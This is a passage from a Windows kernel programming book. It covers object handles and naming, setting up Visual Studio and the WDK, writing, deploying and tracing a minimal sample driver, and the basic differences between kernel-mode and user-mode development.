to the object. A return value of zero means an invalid handle (and a function call failure). The OpenMutex
function, on the other hand, tries to open a handle to a named mutex. If the mutex with that name does
not exist, the function fails and returns null (0).
Kernel (and driver) code can use either a handle or a direct pointer to an object. The choice is usually
based on the API the code wants to call. In some cases, a handle given by user mode to the driver must be
turned into a pointer with the ObReferenceObjectByHandle function. We’ll discuss these details in a
later chapter.
Most functions return null (zero) on failure, but some do not. Most notably, the CreateFile
function returns INVALID_HANDLE_VALUE (-1) if it fails.
Handle values are multiples of 4, where the first valid handle is 4; zero is never a valid handle value.
Kernel-mode code can use handles when creating/opening objects, but they can also use direct pointers
to kernel objects. This is typically done when a certain API demands it. Kernel code can get a pointer
to an object given a valid handle using the ObReferenceObjectByHandle function. If successful,
the reference count on the object is incremented, so there is no danger that if the user-mode client
holding the handle decided to close it while kernel code holds a pointer to the object would now hold
a dangling pointer. The object is safe to access regardless of the handle-holder until the kernel code calls
ObDerefenceObject, which decrements the reference count; if the kernel code missed this call, that’s
a resource leak which will only be resolved in the next system boot.
All objects are reference counted. The object manager maintains a handle count and total reference count
for objects. Once an object is no longer needed, its client should close the handle (if a handle was used to
access the object) or dereference the object (if kernel client using a pointer). From that point on, the code
should consider its handle/pointer to be invalid. The Object Manager will destroy the object if its reference
count reaches zero.
Each object points to an object type, which holds information on the type itself, meaning there is a single
type object for each type of object. These are also exposed as exported global kernel variables, some of
which are defined in the kernel headers and are needed in certain cases, as we’ll see in later chapters.
Object Names
Some types of objects can have names. These names can be used to open objects by name with a suitable
Open function. Note that not all objects have names; for example, processes and threads don’t have names
– they have IDs. That’s why the OpenProcess and OpenThread functions require a process/thread
identifier (a number) rather than a string-based name. Another somewhat weird case of an object that does
not have a name is a file. The file name is not the object’s name – these are different concepts.
Threads appear to have a name (starting from Windows 10), that can be set with the user-
mode API SetThreadDescription. This is not, however, a true name, but rather a friendly
name/description most useful in debugging, as Visual Studio shows a thread’s description, if
there is any.
From user-mode code, calling a Create function with a name creates the object with that name if an object
with that name does not exist, but if it exists it just opens the existing object. In the latter case, calling
GetLastError returns ERROR_ALREADY_EXISTS, indicating this is not a new object, and the returned
handle is yet another handle to an existing object.
The name provided to a Create function is not actually the final name of the object. It’s prepended with
\Sessions\x\BaseNamedObjects\ where x is the session ID of the caller. If the session is zero, the name is
prepended with \BaseNamedObjects\. If the caller happens to be running in an AppContainer (typically
a Universal Windows Platform process), then the prepended string is more complex and consists of the
unique AppContainer SID: \Sessions\x\AppContainerNamedObjects\{AppContainerSID}.
All the above means that object names are session-relative (and in the case of AppContainer – package
relative). If an object must be shared across sessions it can be created in session 0 by prepending
the object name with Global\; for example, creating a mutex with the CreateMutex function named
Global\MyMutex will create it under \BaseNamedObjects. Note that AppContainers do not have the power
to use session 0 object namespace.
This hierarchy can be viewed with the Sysinternals WinObj tool (run elevated) as shown in figure 1-10.
Figure 1-10: Sysinternals WinObj tool
The view shown in figure 1-10 is the object manager namespace, comprising a hierarchy of named objects.
This entire structure is held in memory and manipulated by the Object Manager (part of the Executive)
as required. Note that unnamed objects are not part of this structure, meaning the objects seen in WinObj
do not comprise all the existing objects, but rather all the objects that were created with a name.
Every process has a private handle table to kernel objects (whether named or not), which can be viewed
with the Process Explorer and/or Handles Sysinternals tools. A screenshot of Process Explorer showing
handles in some process is shown in figure 1-11. The default columns shown in the handles view are the
object type and name only. However, there are other columns available, as shown in figure 1-11.
Figure 1-11: Viewing handles in processes with Process Explorer
By default, Process Explorer shows only handles for objects that have names (according to Process
Explorer’s definition of a name, discussed shortly). To view all handles in a process, select Show Unnamed
Handles and Mappings from Process Explorer’s View menu.
The various columns in the handle view provide more information for each handle. The handle value and
the object type are self explanatory. The name column is tricky. It shows true object names for Mutexes
(Mutants), Semaphores, Events, Sections, ALPC Ports, Jobs, Timers, Directory (object manager Directories,
not file system directories), and other, less used object types. Yet others are shown with a name that has a
different meaning than a true named object:
• For Process and Thread objects, the name is shown as their unique ID.
• For File objects, it shows the file name (or device name) pointed to by the file object. It’s not the
same as an object’s name, as there is no way to get a handle to a file object given the file name -
only a new file object may be created that accesses the same underlying file or device (assuming
sharing settings for the original file object allow it).
• (Registry) Key objects names are shown with the path to the registry key. This is not a name, for
the same reasoning as for file objects.
• Token object names are shown with the user name stored in the token.
Accessing Existing Objects
The Access column in Process Explorer’s handles view shows the access mask which was used to open or
create the handle. This access mask is key to what operations are allowed to be performed with a specific
handle. For example, if client code wants to terminate a process, it must call the OpenProcess function
first, to obtain a handle to the required process with an access mask of (at least) PROCESS_TERMINATE,
otherwise there is no way to terminate the process with that handle. If the call succeeds, then the call to
TerminateProcess is bound to succeed.
Here’s a user-mode example for terminating a process given a process ID:
bool KillProcess(DWORD pid) {
    //
    // open a powerful-enough handle to the process
    //
    HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pid);
    if (!hProcess)
        return false;

    //
    // now kill it with some arbitrary exit code
    //
    BOOL success = TerminateProcess(hProcess, 1);

    //
    // close the handle
    //
    CloseHandle(hProcess);

    return success != FALSE;
}
The Decoded Access column provides a textual description of the access mask (for some object types),
making it easier to identify the exact access allowed for a particular handle.
Double-clicking a handle entry (or right-clicking and selecting Properties) shows some of the object’s
properties. Figure 1-12 shows a screenshot of an example event object properties.
Figure 1-12: Object properties in Process Explorer
Notice that the dialog shown in figure 1-12 is for the object’s properties, rather than the handle’s. In other
words, looking at an object’s properties from any handle that points to the same object shows the same
information.
The properties in figure 1-12 include the object’s name (if any), its type, a short description, its address
in kernel memory, the number of open handles, and some specific object information, such as the state
and type of the event object shown. Note that the References shown do not indicate the actual number
of outstanding references to the object (it does prior to Windows 8.1). A proper way to see the actual
reference count for the object is to use the kernel debugger’s !trueref command, as shown here:
lkd> !object 0xFFFFA08F948AC0B0
Object: ffffa08f948ac0b0
Type: (ffffa08f684df140) Event
ObjectHeader: ffffa08f948ac080 (new version)
HandleCount: 2
PointerCount: 65535
Directory Object: ffff90839b63a700
Name: ShellDesktopSwitchEvent
lkd> !trueref ffffa08f948ac0b0
ffffa08f948ac0b0: HandleCount: 2 PointerCount: 65535 RealPointerCount: 3
We’ll take a closer look at the attributes of objects and the kernel debugger in later chapters.
In the next chapter, we’ll start writing a very simple driver to show and use many of the tools we’ll need
later in this book.
Chapter 2: Getting Started with Kernel Development
This chapter deals with the fundamentals needed to get up and running with kernel driver development.
During the course of this chapter, you’ll install the necessary tools and write a very basic driver that can
be loaded and unloaded.
In this chapter:
• Installing the Tools
• Creating a Driver Project
• The DriverEntry and Unload routines
• Deploying the Driver
• Simple Tracing
Installing the Tools
In the old days (pre-2012), the process of developing and building drivers included using a dedicated build
tool from the Device Driver Kit (DDK), without having an integrated development experience developers
were used to when developing user-mode applications. There were some workarounds, but none of them
was perfect nor officially supported by Microsoft.
Fortunately, starting with Visual Studio 2012 and Windows Driver Kit 8, Microsoft officially supports
building drivers with Visual Studio (with msbuild), without the need to use a separate compiler and build
tools.
To get started with driver development, the following tools must be installed (in this order) on your
development machine:
• Visual Studio 2019 with the latest updates. Make sure the C++ workload is selected during
installation. Note that any SKU will do, including the free Community edition.
• Windows 11 SDK (generally, the latest is recommended). Make sure at least the Debugging Tools for
Windows item is selected during installation.
• Windows 11 Driver Kit (WDK) - it supports building drivers for Windows 7 and later versions of
Windows. Make sure the wizard installs the project templates for Visual Studio at the end of the
installation.
• The Sysinternals tools, which are invaluable in any “internals” work, can be downloaded for free
from http://www.sysinternals.com. Click on Sysinternals Suite on the left of that web page and
download the Sysinternals Suite zip file. Unzip to any folder, and the tools are ready to go.
The SDK and WDK versions must match. Follow the guidelines in the WDK download page to
load the corresponding SDK with the WDK.
A quick way to make sure the WDK templates are installed correctly is to open Visual Studio
and select New Project and look for driver projects, such as “Empty WDM Driver”.
Creating a Driver Project
With the above installations in place, a new driver project can be created. The template you’ll use in this
section is “WDM Empty Driver”. Figure 2-1 shows what the New Project dialog looks like for this type
of driver in Visual Studio 2019. Figure 2-2 shows the same initial wizard with Visual Studio 2019 if the
Classic Project Dialog extension is installed and enabled. The project in both figures is named “Sample”.
Figure 2-1: New WDM Driver Project in Visual Studio 2019
Figure 2-2: New WDM Driver Project in Visual Studio 2019 with the Classic Project Dialog extension
Once the project is created, the Solution Explorer shows a single file within the Driver Files filter -
Sample.inf. You won’t need this file in this example, so simply delete it (right-click and select Remove
or press the Del key).
Now it’s time to add a source file. Right-click the Source Files node in Solution Explorer and select Add /
New Item… from the File menu. Select a C++ source file and name it Sample.cpp. Click OK to create it.
The DriverEntry and Unload Routines
Every driver has an entry point called DriverEntry by default. This can be considered the “main”
function of the driver, comparable to the classic main of a user-mode application. This function is called
by a system thread at IRQL PASSIVE_LEVEL (0). (IRQLs are discussed in detail in chapter 8.)
DriverEntry has a predefined prototype, shown here:
NTSTATUS
DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath);
The _In_ annotations are part of the Source (Code) Annotation Language (SAL). These annotations are
transparent to the compiler, but provide metadata useful for human readers and static analysis tools. I may
remove these annotations in code samples to make it easier to read, but you should use SAL annotations
whenever possible.
A minimal DriverEntry routine could just return a successful status, like so:
NTSTATUS
DriverEntry(
    _In_ PDRIVER_OBJECT DriverObject,
    _In_ PUNICODE_STRING RegistryPath) {
    return STATUS_SUCCESS;
}
This code would not yet compile. First, you’ll need to include a header that has the required definitions
for the types present in DriverEntry. Here’s one possibility:
#include <ntddk.h>
Now the code has a better chance of compiling, but would still fail. One reason is that by default, the
compiler is set to treat warnings as errors, and the function does not make use of its given arguments.
Removing treat warnings as errors from the compiler’s options is not recommended, as some warnings
may be errors in disguise. These warnings can be resolved by removing the argument names entirely (or
commenting them out), which is fine for C++ files. There is another, more “classic” way to solve this, which
is to use the UNREFERENCED_PARAMETER macro:
NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(DriverObject);
    UNREFERENCED_PARAMETER(RegistryPath);
    return STATUS_SUCCESS;
}
As it turns out, this macro references the given argument simply by writing its value as an expression statement; this shuts the compiler up, making the argument technically "referenced".
Building the project now compiles fine, but causes a linker error. The DriverEntry function must have
C-linkage, which is not the default in C++ compilation. Here’s the final version of a successful build of the
driver consisting of a DriverEntry function only:
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(DriverObject);
    UNREFERENCED_PARAMETER(RegistryPath);
    return STATUS_SUCCESS;
}
At some point, the driver may be unloaded. At that time, anything done in the DriverEntry function
must be undone. Failure to do so creates a leak, which the kernel will not clean up until the next reboot.
Drivers can have an Unload routine that is automatically called before the driver is unloaded from memory.
Its pointer must be set using the DriverUnload member of the driver object:
DriverObject->DriverUnload = SampleUnload;
The unload routine accepts the driver object (the same one passed to DriverEntry) and returns void.
As our sample driver has done nothing in terms of resource allocation in DriverEntry, there is nothing
to do in the Unload routine, so we can leave it empty for now:
void SampleUnload(_In_ PDRIVER_OBJECT DriverObject) {
    UNREFERENCED_PARAMETER(DriverObject);
}
Here is the complete driver source at this point:
#include <ntddk.h>

void SampleUnload(_In_ PDRIVER_OBJECT DriverObject) {
    UNREFERENCED_PARAMETER(DriverObject);
}

extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = SampleUnload;
    return STATUS_SUCCESS;
}
Deploying the Driver
Now that we have a successfully compiled Sample.sys driver file, let’s install it on a system and then load
it. Normally, you would install and load a driver on a virtual machine, to remove the risk of crashing your
primary machine. Feel free to do so, or take the slight risk with this minimalist driver.
Installing a software driver, just like installing a user-mode service, requires calling the CreateService
API with proper arguments, or using a comparable tool. One of the well-known tools for this purpose
is Sc.exe (short for Service Control), a built-in Windows tool for managing services. We’ll use this tool
to install and then load the driver. Note that installation and loading of drivers is a privileged operation,
normally available for administrators.
Open an elevated command window and type the following (the last part should be the path on your
system where the SYS file resides):
sc create sample type= kernel binPath= c:\dev\sample\x64\debug\sample.sys
Note there is no space between type and the equal sign, and there is a space between the equal sign and
kernel; same goes for the second part.
If all goes well, the output should indicate success. To test the installation, you can open the registry editor
(regedit.exe) and look for the driver details at HKLM\System\CurrentControlSet\Services\Sample. Figure
2-3 shows a screenshot of the registry editor after the previous command.
Figure 2-3: Registry for an installed driver
To load the driver, we can use the Sc.exe tool again, this time with the start option, which uses the
StartService API to load the driver (the same API used to load services). However, on 64 bit systems
drivers must be signed, and so normally the following command would fail:
sc start sample
Since it’s inconvenient to sign a driver during development (maybe even not possible if you don’t have
a proper certificate), a better option is to put the system into test signing mode. In this mode, unsigned
drivers can be loaded without a hitch.
With an elevated command window, test signing can be turned on like so:
bcdedit /set testsigning on
Unfortunately, this command requires a reboot to take effect. Once rebooted, the previous start command
should succeed.
If you are testing on a Windows 10 (or later) system with Secure Boot enabled, changing the
test signing mode will fail. This is one of the settings protected by Secure Boot (local kernel
debugging is also protected by Secure Boot). If you can’t disable Secure Boot through BIOS
setting, because of IT policy or some other reason, your best option is to test on a virtual
machine.
There is yet another setting that you may need to specify if you intend to test the driver on a pre-Windows 10 machine. In this case, you have to set the target OS version in the project properties dialog, as shown
in figure 2-4. Notice that I have selected all configurations and all platforms, so that when switching
configurations (Debug/Release) or platforms (x86/x64/ARM/ARM64), the setting is maintained.
Figure 2-4: Setting Target OS Platform in the project properties
Once test signing mode is on, and the driver is loaded, this is the output you should see:
c:\>sc start sample

SERVICE_NAME: sample
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 0
        FLAGS              :
This means everything is well, and the driver is loaded. To confirm, we can open Process Explorer and
find the Sample.Sys driver image file. Figure 2-5 shows the details of the sample driver image loaded into
system space.
Figure 2-5: sample driver image loaded into system space
At this point, we can unload the driver using the following command:
sc stop sample
Behind the scenes, sc.exe calls the ControlService API with the SERVICE_CONTROL_STOP value.
Unloading the driver causes the Unload routine to be called, which at this time does nothing. You can
verify the driver is indeed unloaded by looking at Process Explorer again; the driver image entry should
not be there anymore.
Simple Tracing
How can we know for sure that the DriverEntry and Unload routines actually executed? Let’s add basic
tracing to these functions. Drivers can use the DbgPrint function to output printf-style text that can
be viewed using the kernel debugger, or some other tool.
Here are updated versions of DriverEntry and the Unload routine that use DbgPrint to trace the fact that their code executed:
void SampleUnload(PDRIVER_OBJECT DriverObject) {
    UNREFERENCED_PARAMETER(DriverObject);
    DbgPrint("Sample driver Unload called\n");
}

extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = SampleUnload;
    DbgPrint("Sample driver initialized successfully\n");
    return STATUS_SUCCESS;
}
A more typical approach is to have these outputs in Debug builds only. This is because DbgPrint has
some overhead that you may want to avoid in Release builds. KdPrint is a macro that is only compiled in
Debug builds and calls the underlying DbgPrint kernel API. Here is a revised version that uses KdPrint:
void SampleUnload(PDRIVER_OBJECT DriverObject) {
    UNREFERENCED_PARAMETER(DriverObject);
    KdPrint(("Sample driver Unload called\n"));
}

extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = SampleUnload;
    KdPrint(("Sample driver initialized successfully\n"));
    return STATUS_SUCCESS;
}
Notice the double parenthesis when using KdPrint. This is required because KdPrint is a macro, but
apparently accepts any number of arguments, a-la printf. Since macros cannot receive a variable number
of parameters, a compiler trick is used to call the DbgPrint function that does accept a variable number
of parameters.
With these statements in place, we would like to load the driver again and see these messages. We’ll use a
kernel debugger in chapter 4, but for now we’ll use a useful Sysinternals tool named DebugView.
Before running DebugView, you’ll need to make some preparations. First, starting with Windows Vista,
DbgPrint output is not actually generated unless a certain value is in the registry. You’ll have to add
a key named Debug Print Filter under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager (the
key typically does not exist). Within this new key, add a DWORD value named DEFAULT (not the default
value that exists in any key) and set its value to 8 (technically, any value with bit 3 set will do). Figure 2-6
shows the setting in RegEdit. Unfortunately, you’ll have to restart the system for this setting to take effect.
Figure 2-6: Debug Print Filter key in the registry
Once this setting has been applied, run DebugView (DbgView.exe) elevated. In the Options menu, make
sure Capture Kernel is selected (or press Ctrl+K). You can safely deselect Capture Win32 and Capture
Global Win32, so that user-mode output from various processes does not clutter the display.
DebugView is able to show kernel debug output even without the Registry value shown in figure
2-6 if you select Enable Verbose Kernel Output from its Capture menu. However, it seems this
option does not work on Windows 11, and the Registry setting is necessary.
Build the driver, if you haven’t already. Now you can load the driver again from an elevated command
window (sc start sample). You should see output in DebugView as shown in figure 2-7. If you unload
the driver, you’ll see another message appearing because the Unload routine was called. (The third output
line is from another driver and has nothing to do with our sample driver.)
Figure 2-7: Sysinternals DebugView Output
Add code to the sample DriverEntry to output the Windows OS version: major, minor, and
build number. Use the RtlGetVersion function to retrieve the information. Check the results
with DebugView.
Summary
We’ve seen the tools you need to have for kernel development and wrote a very minimalistic driver to
prove the basic tools work. In the next chapter, we’ll look at the fundamental building blocks of kernel
APIs, concepts, and fundamental structures.
Chapter 3: Kernel Programming Basics
In this chapter, we’ll dig deeper into kernel APIs, structures, and definitions. We’ll also examine some of
the mechanisms that invoke code in a driver. Finally, we’ll put all that knowledge together to create our
first functional driver and client application.
In this chapter:
• General Kernel Programming Guidelines
• Debug vs. Release Builds
• The Kernel API
• Functions and Error Codes
• Strings
• Dynamic Memory Allocation
• Linked Lists
• Object Attributes
• The Driver Object
• Device Objects
General Kernel Programming Guidelines
Developing kernel drivers requires the Windows Driver Kit (WDK), where the appropriate headers and
libraries needed are located. The kernel APIs consist of C functions, very similar in essence to user-mode
APIs. There are several differences, however. Table 3-1 summarizes the important differences between
user-mode programming and kernel-mode programming.
Table 3-1: Differences between user mode and kernel mode development

Unhandled Exceptions
    User mode:   Unhandled exceptions crash the process
    Kernel mode: Unhandled exceptions crash the system

Termination
    User mode:   When a process terminates, all private memory and resources are freed automatically
    Kernel mode: If a driver unloads without freeing everything it was using, there is a leak, only resolved in the next boot

Return values
    User mode:   API errors are sometimes ignored
    Kernel mode: Should (almost) never ignore errors

IRQL
    User mode:   Always PASSIVE_LEVEL (0)
    Kernel mode: May be DISPATCH_LEVEL (2) or higher

Bad coding
    User mode:   Typically localized to the process
    Kernel mode: Can have system-wide effects

Testing and Debugging
    User mode:   Typical testing and debugging done on the developer's machine
    Kernel mode: Debugging must be done with another machine

Libraries
    User mode:   Can use almost any C/C++ library (e.g. STL, boost)
    Kernel mode: Most standard libraries cannot be used

Exception Handling
    User mode:   Can use C++ exceptions or Structured Exception Handling (SEH)
    Kernel mode: Only SEH can be used

C++ Usage
    User mode:   Full C++ runtime available
    Kernel mode: No C++ runtime
Unhandled Exceptions
Exceptions occurring in user-mode that are not caught by the program cause the process to terminate
prematurely. Kernel-mode code, on the other hand, being implicitly trusted, cannot recover from an
unhandled exception. Such an exception causes the system to crash with the infamous Blue screen of
death (BSOD) (newer versions of Windows have more diverse colors for the crash screen). The BSOD may
first appear to be a form of punishment, but it's essentially a protection mechanism. The rationale behind it is that allowing the code to continue execution could cause irreversible damage to Windows (such as deleting important files or corrupting the registry) that may prevent the system from booting. It's better, then,
to stop everything immediately to prevent potential damage. We’ll discuss the BSOD in more detail in
chapter 6.
All this leads to at least one conclusion: kernel code must be programmed carefully and meticulously, never skipping details or error checks.
Termination
When a process terminates, for whatever reason - either normally, because of an unhandled exception,
or terminated by external code - it never leaks anything: all private memory is freed, and all handles are
closed. Of course, premature handle closing may cause some loss of data, such as a file handle being closed
before flushing some data to disk - but there are no resource leaks beyond the lifetime of the process; this
is guaranteed by the kernel.
Kernel drivers, on the other hand, don’t provide such a guarantee. If a driver unloads while still holding
onto allocated memory or open kernel handles - these resources will not be freed automatically, only
released at the next system boot.
Why is that? Can’t the kernel keep track of a driver’s allocations and resource usage so these can be freed
automatically when the driver unloads?
Theoretically, this would have been possible to achieve (although currently the kernel does not track such
resource usage). The real issue is that it would be too dangerous for the kernel to attempt such cleanup.
The kernel has no way of knowing whether the driver leaked those resources for a reason; for example, the
driver could allocate some buffer and then pass it to another driver, with which it cooperates. That second
driver may use the memory buffer and free it eventually. If the kernel attempted to free the buffer when
the first driver unloads, the second driver would cause an access violation when accessing that now-freed
buffer, causing a system crash.
This emphasizes the responsibility of a kernel driver to properly clean up after itself; no one else will do it.
Function Return Values
In typical user-mode code, return values from API functions are sometimes ignored, the developer being
somewhat optimistic that the called function is unlikely to fail. This may or may not be appropriate for
one function or another, but in the worst case, an unhandled exception would later crash the process; the
system, however, remains intact.
Ignoring return values from kernel APIs is much more dangerous (see the previous Termination section),
and generally should be avoided. Even seemingly “innocent” looking functions can fail for unexpected
reasons, so the golden rule here is - always check return status values from kernel APIs.
IRQL
Interrupt Request Level (IRQL) is an important kernel concept that will be further discussed in chapter 6.
Suffice it to say at this point that normally a processor’s IRQL is zero, and in particular it’s always zero
when user-mode code is executing. In kernel mode, it’s still zero most of the time - but not all the time.
Some restrictions on code execution exist at IRQL 2 and higher, which means the driver writer must be
careful to use only allowed APIs at that high IRQL. The effects of higher than zero IRQLs are discussed in
chapter 6.
C++ Usage
In user mode programming, C++ has been used for many years, and it works well when combined with
user-mode Windows APIs. With kernel code, Microsoft started officially supporting C++ with Visual
Studio 2012 and WDK 8. C++ is not mandatory, of course, but it has some important benefits related
to resource cleanup, with a C++ idiom called Resource Acquisition Is Initialization (RAII). We’ll use this
RAII idiom quite a bit to make sure we don’t leak resources.
C++ as a language is almost fully supported for kernel code. But there is no C++ runtime in the kernel,
and so some C++ features just cannot be used:
• The new and delete operators are not supported and will fail to compile. This is because their
normal operation is to allocate from a user-mode heap, which is irrelevant within the kernel. The
kernel API has “replacement” functions that are more closely modeled after the C functions malloc
and free. We’ll discuss these functions later in this chapter. It is possible, however, to overload the
new and delete operators similarly as is sometimes done in user-mode, and invoke the kernel
allocation and free functions in the implementation. We’ll see how to do that later in this chapter
as well.
• Constructors of global variables will not be called - there is no C/C++ runtime to invoke them. These situations must be avoided, but there are some workarounds:
– Avoid any code in the constructor and instead create some Init function to be called explicitly
from driver code (e.g. from DriverEntry).
– Allocate a pointer only as a global (or static) variable, and create the actual instance
dynamically. The compiler will generate the correct code to invoke the constructor. This works
assuming the new and delete operators have been overloaded, as described later in this
chapter.
• The C++ exception handling keywords (try, catch, throw) do not compile. This is because
the C++ exception handling mechanism requires its own runtime, which is not present in the
kernel. Exception handling can only be done using Structured Exception Handling (SEH) - a kernel
mechanism to handle exceptions. We’ll take a detailed look at SEH in chapter 6.
• The standard C++ libraries are not available in the kernel. Although most are template-based, these
do not compile, because they may depend on user-mode libraries and semantics. That said, C++
templates as a language feature work just fine. One good use of templates is to create kernel-mode alternatives to types from the user-mode standard C++ library, such as std::vector<> and std::wstring.
The code examples in this book make some use of C++. The features mostly used in the code examples
are:
• The nullptr keyword, representing a true NULL pointer.
• The auto keyword that allows type inference when declaring and initializing variables. This is
useful to reduce clutter, save some typing, and focus on the important pieces.
• Templates will be used where they make sense.
• Overloading of the new and delete operators.
• Constructors and destructors, especially for building RAII types.
Any C++ standard can be used for kernel development. The Visual Studio setting for new projects is to
use C++ 14. However, you can change the C++ compiler standard to any other setting, including C++ 20
(the latest standard as of this writing). Some features we’ll use later will depend on C++ 17 at least.
Strictly speaking, kernel drivers can be written in pure C without any issues. If you prefer to go that route,
use files with a C extension rather than CPP. This will automatically invoke the C compiler for these files.
Testing and Debugging
With user-mode code, testing is generally done on the developer’s machine (if all required dependencies
can be satisfied). Debugging is typically done by attaching the debugger (Visual Studio in most cases) to
the running process or launching an executable and attaching to the process.
With kernel code, testing is typically done on another machine, usually a virtual machine hosted on
the developer’s machine. This ensures that if a BSOD occurs, the developer’s machine is unaffected.
Debugging kernel code must be done with another machine, where the actual driver is executing. This
is because hitting a breakpoint in kernel-mode freezes the entire machine, not just a particular process.
The developer’s machine hosts the debugger itself, while the second machine (again, usually a virtual
machine) executes the driver code. These two machines must be connected through some mechanism
so data can flow between the host (where the debugger is running) and the target. We’ll look at kernel
debugging in more detail in chapter 5.
Debug vs. Release Builds
Just like with user-mode projects, building kernel drivers can be done in Debug or Release mode. The
differences are similar to their user-mode counterparts - Debug builds use no compiler optimizations by
default, but are easier to debug. Release builds utilize full compiler optimizations by default to produce
the fastest and smallest code possible. There are a few differences, however.
The terms in kernel terminology are Checked (Debug) and Free (Release). Although Visual Studio kernel
projects continue to use the Debug/Release terms, older documentation uses the Checked/Free terms. From
a compilation perspective, kernel Debug builds define the symbol DBG and set its value to 1 (compared to
the _DEBUG symbol defined in user mode). This means you can use the DBG symbol to distinguish between
Debug and Release builds with conditional compilation. This is, for example, what the KdPrint macro
does: in Debug builds, it compiles to calling DbgPrint, while in Release builds it compiles to nothing,
resulting in KdPrint calls having no effect in Release builds. This is usually what you want because these
calls are relatively expensive. We’ll discuss other ways of logging information in chapter 5.
The Kernel API
Kernel drivers use exported functions from kernel components. These functions will be referred to as the
Kernel API. Most functions are implemented within the kernel module itself (NtOskrnl.exe), but some may be implemented by other kernel modules, such as the HAL (hal.dll).
The Kernel API is a large set of C functions. Most of these start with a prefix suggesting the component
implementing that function. Table 3-2 shows some of the common prefixes and their meaning:
Table 3-2: Common kernel API prefixes

Prefix   Meaning                               Example
Ex       General executive functions           ExAllocatePoolWithTag
Ke       General kernel functions              KeAcquireSpinLock
Mm       Memory manager                        MmProbeAndLockPages
Rtl      General runtime library               RtlInitUnicodeString
FsRtl    File system runtime library           FsRtlGetFileSize
Flt      File system mini-filter library       FltCreateFile
Ob       Object manager                        ObReferenceObject
Io       I/O manager                           IoCompleteRequest
Se       Security                              SeAccessCheck
Ps       Process manager                       PsLookupProcessByProcessId
Po       Power manager                         PoSetSystemState
Wmi      Windows management instrumentation    WmiTraceMessage
Zw       Native API wrappers                   ZwCreateFile
Hal      Hardware abstraction layer            HalExamineMBR
Cm       Configuration manager (registry)      CmRegisterCallbackEx
If you take a look at the exported functions list from NtOsKrnl.exe, you’ll find many functions that are
not documented in the Windows Driver Kit; this is just a fact of a kernel developer’s life - not everything
is documented.
One set of functions bears discussion at this point - the Zw prefixed functions. These functions mirror
native APIs available as gateways from NtDll.Dll with the actual implementation provided by the
Executive. When an Nt function is called from user mode, such as NtCreateFile, it reaches the Executive
at the actual NtCreateFile implementation. At this point, NtCreateFile might do various checks
based on the fact that the original caller is from user mode. This caller information is stored on a thread-
by-thread basis, in the undocumented PreviousMode member in the KTHREAD structure for each thread.
You can query the previous processor mode by calling the documented ExGetPreviousMode API.
On the other hand, if a kernel driver needs to call a system service, it should not be subjected to the
same checks and constraints imposed on user-mode callers. This is where the Zw functions come into
play. Calling a Zw function sets the previous caller mode to KernelMode (0) and then invokes the
native function. For example, calling ZwCreateFile sets the previous caller to KernelMode and then
calls NtCreateFile, causing NtCreateFile to bypass some security and buffer checks that would
otherwise be performed. The bottom line is that kernel drivers should call the Zw functions unless there
is a compelling reason to do otherwise.
Functions and Error Codes
Most kernel API functions return a status indicating success or failure of an operation. This is typed as
NTSTATUS, a signed 32-bit integer. The value STATUS_SUCCESS (0) indicates success. A negative value
indicates some kind of error. You can find all the defined NTSTATUS values in the file <ntstatus.h>.
Most code paths don’t care about the exact nature of the error, and so testing the most significant bit is
enough to find out whether an error occurred. This can be done with the NT_SUCCESS macro. Here is an
example that tests for failure and logs an error if that is the case:
Chapter 3: Kernel Programming Basics
39
NTSTATUS DoWork() {
NTSTATUS status = CallSomeKernelFunction();
if(!NT_SUCCESS(status)) {
KdPrint(("Error occurred: 0x%08X\n", status));
return status;
}
// continue with more operations
return STATUS_SUCCESS;
}
In some cases, NTSTATUS values are returned from functions that eventually bubble up to user mode. In
these cases, the STATUS_xxx value is translated to some ERROR_yyy value that is available to user-mode
through the GetLastError function. Note that these are not the same numbers; for one, error codes in
user-mode have positive values (zero is still success). Second, the mapping is not one-to-one. In any case,
this is not generally a concern for a kernel driver.
Internal kernel driver functions also typically return NTSTATUS to indicate their success/failure status.
This is usually convenient, as these functions make calls to kernel APIs and so can propagate any error
by simply returning the same status they got back from the particular API. This also implies that the
“real” return values from driver functions are typically returned through pointers or references provided as
arguments to the function.
Return NTSTATUS from your own functions. It makes error reporting easier and more
consistent.
Strings
The kernel API uses strings in many scenarios as needed. In some cases, these strings are simple Unicode
pointers (wchar_t* or one of their typedefs such as WCHAR*), but most functions dealing with strings
expect a structure of type UNICODE_STRING.
The term Unicode as used in this book is roughly equivalent to UTF-16, which means 2 bytes per character.
This is how strings are stored internally within kernel components. Unicode in general is a set of standards
related to character encoding. You can find more information at https://unicode.org.
The UNICODE_STRING structure represents a string with its length and maximum length known. Here is
a simplified definition of the structure:
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWCH Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
The Length member is in bytes (not characters) and does not include a Unicode-NULL terminator, if one
exists (a NULL terminator is not mandatory). The MaximumLength member is the number of bytes the
string can grow to without requiring a memory reallocation.
Manipulating UNICODE_STRING structures is typically done with a set of Rtl functions that deal
specifically with strings. Table 3-3 lists some of the common functions for string manipulation provided
by the Rtl functions.
Table 3-3: Common UNICODE_STRING functions

